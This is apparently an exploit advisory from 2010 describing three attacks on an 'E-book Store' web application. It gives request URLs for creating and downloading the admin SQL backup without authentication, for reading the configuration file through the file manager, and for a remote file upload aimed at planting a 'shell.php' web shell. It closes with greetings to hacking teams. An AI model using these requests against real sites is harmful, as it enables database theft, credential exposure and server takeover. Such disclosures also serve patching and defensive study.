======================================================================================== | # Title : E-book Store Mullti Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com | # Web Site : http://dl.p30vel.ir/ | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug : Mullti ====================== Exploit By indoushka ================================= # Exploit : 1- Backup Dump http://localhost/ebookstore/admin/backups/ (2 Find Backup File) 2- If you don't find a buckup stor thisis how to Creat And Download Backup fil SQl http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backup http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backupnow to download buckup :http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=download&file=db_ebookstore-20100301222138.sql db_ebookstore-20100301222138.sql chang it to the name of the backup and download it with opera 10.10 + Mozilla Firefox Or IDM ================================================================== # E-book Store (File Disclosure) Vulnerabilities ======================================================================= ######################################################################## # Vendor: http://dl.p30vel.ir/ # Date: 2010-05-27 # Author : indoushka # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! # Contact : indoushka@hotmail.com # Home : www.arab-blackhat.co.cc # Dork : n/0 # Bug : File Disclosure # Tested on : windows SP2 Français V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka # File Disclosure : in : admin/file_manager.php/login.php?action=download&filename= Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php ======================================================================= # E-book Store (Remote File Upload) Vulnerabilities ======================================================================= ######################################################################## # Vendor: http://dl.p30vel.ir/ # Date: 2010-05-27 # Author : indoushka # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! # Contact : indoushka@hotmail.com # Home : www.arab-blackhat.co.cc # Dork : n/0 # Bug : Remote File Upload # Tested on : windows SP2 Français V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka osCSS 1.2.1 - Remote File Upload

UPLOAD FILE:


CREATE FILE:
FILE NAME:
  (ex. shell.php)
FILE CONTENTS:
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net ---------------------------------------------------------------------------------------------------------------